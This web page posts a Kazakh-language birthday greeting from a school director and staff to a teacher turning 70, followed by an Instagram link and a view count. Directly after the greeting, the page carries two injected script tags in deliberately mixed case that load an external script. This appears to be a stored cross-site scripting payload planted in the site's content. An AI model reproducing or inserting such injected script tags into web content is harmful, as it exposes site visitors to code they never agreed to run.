Құрметті Зейнеп Жұмансейітқызы! Сізді адам өмірінің айтулы белесі - 70 жасқа толу мерейтойыңызбен шын жүректен құттықтаймыз! Сіз көп жылдан бері білім беру саласында тынымсыз еңбек етіп, осы жолда көп белес- биіктерден өткен жігерлі тұлғасыз. Бойыңыздағы еңбекке адал, өмірден тоқығаны мол кемел ойлы ұстазсыз. Мақсатқа берік қасиеттеріңіздің арқасында Сіз бүгінде талай жас буынның дана , дара , ақылғой ұстазы болып келесіз. Шәкірттеріңізді білім нәрімен сусындатып, тәлім тәрбие беруде, жақсы қасиеттерді бойларына дарытып, адамгершілік рухта бағыт - бағдар беруде еңбектеріңіз зор. Қадірлі Зейнеп Жұмансейітқызы! Сізге осындай мерейлі күні шын көңілімізбен зор денсаулық, қажымас қайрат, отбасыңызға баянды бақыт тілейміз. Ізгі ниетпен:мектеп директоры Мугжанова . А. Д және мектеп ұжымы.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.04.2021

https://www.instagram.com/p/COJyZb-Hp4Y/?igshid=1w4qw180zz2n6

Просмотров: 231


Пікір қосу



Деректерді қолтаңбаға қосу